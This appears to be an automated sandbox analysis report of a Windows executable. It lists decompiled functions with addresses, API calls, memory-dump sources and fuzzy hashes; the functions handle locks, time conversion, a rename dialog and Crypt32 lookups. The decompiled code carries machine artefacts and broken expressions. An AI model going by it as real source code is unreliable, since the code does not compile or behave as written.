								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xcffe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                0x00cbd27b
                0x00cbd286
                0x00cbd28e
                0x00cbd2a0
                0x00cbd2a4
                0x00cbd2b0
                0x00cbd2b8
                0x00000000
                0x00cbd2ba
                0x00cbd2c0
                0x00cbd2c5
                0x00cbd2cd
                0x00000000
                0x00cbd2cf
                0x00cbd2cf
                0x00cbd2cf
                0x00cbd2cd
                0x00cbd2a6
                0x00cbd2a6
                0x00cbd2a6
                0x00cbd2a6
                0x00cbd2dd
                0x00cbd2e3
                0x00cbd2eb
                0x00cbd2f1
                0x00000000
                0x00000000
                0x00000000
                0x00cbd2ed
                0x00cbd2ed
                0x00cbd2ed
                0x00cbd2ed
                0x00cbd2f5
                0x00cbd290
                0x00cbd293
                0x00cbd293
                0x00cbd288
                0x00cbd28b
                0x00cbd28b

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: e732297478465e230843e50b49df21ddfabf17950ecc5e4d3b3a1429d47982b4
                • Instruction ID: a6570837c326ba5ae147a29f7f686f3035af94b6dcf358bd6b98e07eb385c8ee
                • Opcode Fuzzy Hash: e732297478465e230843e50b49df21ddfabf17950ecc5e4d3b3a1429d47982b4
                • Instruction Fuzzy Hash: BF0121726412A34B4F212EA41C907EA6384DE12706710007BEA22C3210F721CD42DBA3
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB0910, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00CB0910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00CAA995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E00CBDDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}
















                0x00cb0910
                0x00cb0914
                0x00cb0923
                0x00cb0925
                0x00cb092e
                0x00cb0937
                0x00cb0940
                0x00cb0949
                0x00cb0952
                0x00cb0959
                0x00cb095e
                0x00cb0972
                0x00cb0a0e
                0x00cb0a10
                0x00cb0978
                0x00cb0984
                0x00cb09aa
                0x00cb09bb
                0x00cb09cb
                0x00cb09d7
                0x00cb09df
                0x00cb09e5
                0x00cb09ed
                0x00cb09f3
                0x00cb09f5
                0x00cb09f9
                0x00cb0986
                0x00cb0990
                0x00cb0996
                0x00cb099a
                0x00cb099a
                0x00cb0a05
                0x00cb0a07
                0x00cb0a07
                0x00cb0a13
                0x00cb0a16
                0x00cb0a18
                0x00cb0a22

                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB096E
                  • Part of subcall function 00CAA995: GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB0990
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB09AA
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB09BB
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB09CB
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB09D7
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 7e23f4e81aeb350b1ee4423e91deafde4b7b414d4285997e43a12805817d13c7
                • Instruction ID: b513a2281873465d4c5e1cd2b8e7b1f63ec6645d4ce80c1b1ffa718bc1093b60
                • Opcode Fuzzy Hash: 7e23f4e81aeb350b1ee4423e91deafde4b7b414d4285997e43a12805817d13c7
                • Instruction Fuzzy Hash: 7B31D57A1083469AC700DFA5C9809ABB7E8FF98704F04491EF999C3210E730E549CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB8BE2, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00CB8BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E00CBF3CA(_a8, 0xcd40bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E00CBF3CA(_t32, 0xcd40fc, _t25) != 0) {
						if(E00CBF3CA(_t32, 0xcd40dc, _t25) != 0) {
							if(E00CBF3CA(_t32, 0xcd40ac, _t25) != 0) {
								if(E00CBF3CA(_t32, 0xcd414c, _t25) != 0) {
									if(E00CBF3CA(_t32, 0xcd409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                0x00cb8be6
                0x00cb8beb
                0x00cb8bf9
                0x00cb8bfe
                0x00cb8c10
                0x00cb8c9f
                0x00cb8c9f
                0x00cb8ca2
                0x00cb8ca4
                0x00cb8ca7
                0x00cb8caa
                0x00cb8cb6
                0x00000000
                0x00cb8cb7
                0x00cb8c27
                0x00cb8c42
                0x00cb8c5d
                0x00cb8c78
                0x00cb8c9d
                0x00cb8cae
                0x00cb8cb1
                0x00000000
                0x00cb8cb1
                0x00000000
                0x00cb8c9d
                0x00cb8c7a
                0x00cb8c7d
                0x00cb8c80
                0x00cb8c84
                0x00cb8c88
                0x00000000
                0x00cb8c88
                0x00cb8c5f
                0x00cb8c62
                0x00000000
                0x00cb8c62
                0x00cb8c44
                0x00cb8c47
                0x00000000
                0x00cb8c47
                0x00cb8c29
                0x00cb8c2c
                0x00000000
                0x00cb8c2c
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: 1804d93f716bafed0d629f04dff29be3461cdd658f921171c61a2f1723b1c687
                • Instruction ID: 3d6ae8913310238f2c9237205b6e3a7d9d4286d5968d91307468b9cf87899f94
                • Opcode Fuzzy Hash: 1804d93f716bafed0d629f04dff29be3461cdd658f921171c61a2f1723b1c687
                • Instruction Fuzzy Hash: 7321AAF164120AABDB189A11CC91FBBBBAC9F50784F14453AFE049B316F730ED49D6A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC8516, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00CC8516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xcdd6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00CC7B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00CC9BA9(_t25, _t36, __eflags,  *0xcdd6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00CC8388(_t25, _t31, 0xd00418);
							E00CC7A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00CC7A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00CC7AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xcdd6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00CC7B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00CC9BA9(_t27, _t37, __eflags,  *0xcdd6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00CC8388(_t27, _t32, 0xd00418);
									E00CC7A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00CC7A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00CC9B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00CC9B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00cc8516
                0x00cc8516
                0x00cc8516
                0x00cc8520
                0x00cc8522
                0x00cc8527
                0x00cc852a
                0x00cc8538
                0x00cc853f
                0x00cc8544
                0x00cc8547
                0x00cc854a
                0x00cc855c
                0x00cc8561
                0x00cc8563
                0x00cc856e
                0x00cc8575
                0x00cc857a
                0x00cc857d
                0x00cc857f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc8565
                0x00cc8565
                0x00000000
                0x00cc8565
                0x00cc854c
                0x00cc854c
                0x00cc854d
                0x00cc854d
                0x00cc8552
                0x00cc858d
                0x00cc858e
                0x00cc8594
                0x00cc8599
                0x00cc859c
                0x00cc859d
                0x00cc859e
                0x00cc85a5
                0x00cc85a7
                0x00cc85a9
                0x00cc85ae
                0x00cc85b1
                0x00cc85bf
                0x00cc85cb
                0x00cc85ce
                0x00cc85d1
                0x00cc85e3
                0x00cc85e8
                0x00cc85ea
                0x00cc85f5
                0x00cc85fb
                0x00cc8603
                0x00cc8605
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc85ec
                0x00cc85ec
                0x00000000
                0x00cc85ec
                0x00cc85d3
                0x00cc85d3
                0x00cc85d4
                0x00cc85d4
                0x00cc8607
                0x00cc8608
                0x00cc8608
                0x00cc85b3
                0x00cc85b9
                0x00cc85bd
                0x00cc8610
                0x00cc8611
                0x00cc8617
                0x00000000
                0x00000000
                0x00000000
                0x00cc85bd
                0x00cc861e
                0x00cc861e
                0x00cc852c
                0x00cc8532
                0x00cc8536
                0x00cc8581
                0x00cc8582
                0x00cc858c
                0x00000000
                0x00000000
                0x00000000
                0x00cc8536

                APIs
                • GetLastError.KERNEL32(?,00CE00E0,00CC3394,00CE00E0,?,?,00CC2E0F,?,?,00CE00E0), ref: 00CC851A
                • _free.LIBCMT ref: 00CC854D
                • _free.LIBCMT ref: 00CC8575
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8582
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC858E
                • _abort.LIBCMT ref: 00CC8594
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 2f6eae62e965c4682da372e8cb98e098b5ef7c8f02a499baabe0305d3b95a43e
                • Instruction ID: fd9bc203366e1e67eee4c3af8ee99557daa0e00a97659b224181e52a64a05d49
                • Opcode Fuzzy Hash: 2f6eae62e965c4682da372e8cb98e098b5ef7c8f02a499baabe0305d3b95a43e
                • Instruction Fuzzy Hash: 03F0C8355856006BE3153335FC4AF2F2759CFE1762B25021EF52993191EEB0CF06A560
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00CBC2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E00CA12D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0xcfde34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0xcfde34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0xcfde34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                0x00cbc2a8
                0x00cbc2ad
                0x00cbc2b2
                0x00cbc2b7
                0x00cbc2cf
                0x00cbc32f
                0x00000000
                0x00cbc331
                0x00cbc2d1
                0x00cbc2d7
                0x00cbc31c
                0x00cbc322
                0x00cbc32d
                0x00000000
                0x00cbc32d
                0x00cbc2dc
                0x00cbc2eb
                0x00000000
                0x00cbc2eb
                0x00cbc2e1
                0x00cbc2e4
                0x00cbc308
                0x00cbc30e
                0x00cbc2f1
                0x00cbc2f2
                0x00000000
                0x00cbc2f2
                0x00cbc2e9
                0x00cbc2ef
                0x00000000
                0x00cbc2ef
                0x00000000

                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBC2F2
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBC308
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBC322
                • SetDlgItemTextW.USER32(?,00000068), ref: 00CBC32D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 2b9a93e9f1fd61d32b2282a2462b084fb5c74e8ba1eee63dccb5fc84a14d264e
                • Instruction ID: cecbc18129fe45e608f53e355e99518c2c831b6524fc3d13eb9346f54d5aa3b7
                • Opcode Fuzzy Hash: 2b9a93e9f1fd61d32b2282a2462b084fb5c74e8ba1eee63dccb5fc84a14d264e
                • Instruction Fuzzy Hash: EE014C33A812147AD6105FA95DC4FBB7B6CE79AB01F104016F343F61E0C2A2AD04D732
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC6B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00CC6B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0xcdd668; // 0x814d2927
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0xcd2260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E00CBE203(_t12, _v8 ^ _t22);
			}








                0x00cc6b7f
                0x00cc6b86
                0x00cc6b89
                0x00cc6b8d
                0x00cc6b98
                0x00cc6ba0
                0x00cc6bb1
                0x00cc6bb5
                0x00cc6bbc
                0x00cc6bc2
                0x00cc6bc2
                0x00cc6bc4
                0x00cc6bc9
                0x00cc6bce
                0x00cc6bce
                0x00cc6be1

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC6B29,?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002), ref: 00CC6B98
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC6BAB
                • FreeLibrary.KERNEL32(00000000,?,?,?,00CC6B29,?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6BCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 6b02a641fe5d1e997c8fec3e2461cc50f6162832371aeb107bc2faa7435e269d
                • Instruction ID: ae86dfee125baeec206da4b00c1fd581190f9a8d0f6750290ad4831eae248dd3
                • Opcode Fuzzy Hash: 6b02a641fe5d1e997c8fec3e2461cc50f6162832371aeb107bc2faa7435e269d
                • Instruction Fuzzy Hash: B3F04431A11219BBCB155B90DD09F9EFFB8EF44715F0000AAF905E2190DB705E44DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAE7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CAE7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00CAFCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                0x00cae7e4
                0x00cae7ea
                0x00cae7f1
                0x00cae7f6
                0x00cae7fa
                0x00cae80f
                0x00cae812
                0x00cae818
                0x00cae818
                0x00cae81b
                0x00000000
                0x00cae81b
                0x00cae820

                APIs
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAE802
                • GetProcAddress.KERNEL32(00CE7350,CryptUnprotectMemory), ref: 00CAE812
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: dd5288542c9bc25b20713505c1cc4e995f82c363855b8533817e550ba937165a
                • Instruction ID: cd376c680cbbbf6123d087f315ab4e7ced1d9dac713639cc603f90717fffda8f
                • Opcode Fuzzy Hash: dd5288542c9bc25b20713505c1cc4e995f82c363855b8533817e550ba937165a
                • Instruction Fuzzy Hash: 30E04FB0541743AADB106B799808705FBA4AF61714B10C137B524D3291DBB4D051CB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC7389, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00CC7389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xcdd668; // 0x814d2927
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00CC69A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00CBDB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00CBDB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00CBDB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00CCAC29(_t56);
						_t40 = E00CC7A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00CCAC29(_t56);
						E00CC7A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xcdd668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                0x00cc7389
                0x00cc7393
                0x00cc7397
                0x00cc7399
                0x00cc739d
                0x00cc73a7
                0x00cc73b8
                0x00cc73bd
                0x00cc73bf
                0x00cc73c1
                0x00cc73c3
                0x00cc73c5
                0x00cc73c9
                0x00cc7483
                0x00cc7491
                0x00cc7493
                0x00cc7498
                0x00cc749f
                0x00cc74a1
                0x00cc74af
                0x00cc74be
                0x00cc74c1
                0x00cc74c3
                0x00000000
                0x00cc74c4
                0x00cc73d1
                0x00cc73d6
                0x00cc73db
                0x00cc73dd
                0x00cc73dd
                0x00cc73df
                0x00cc73e4
                0x00cc73e8
                0x00cc73e8
                0x00cc73eb
                0x00cc740a
                0x00cc740a
                0x00cc740c
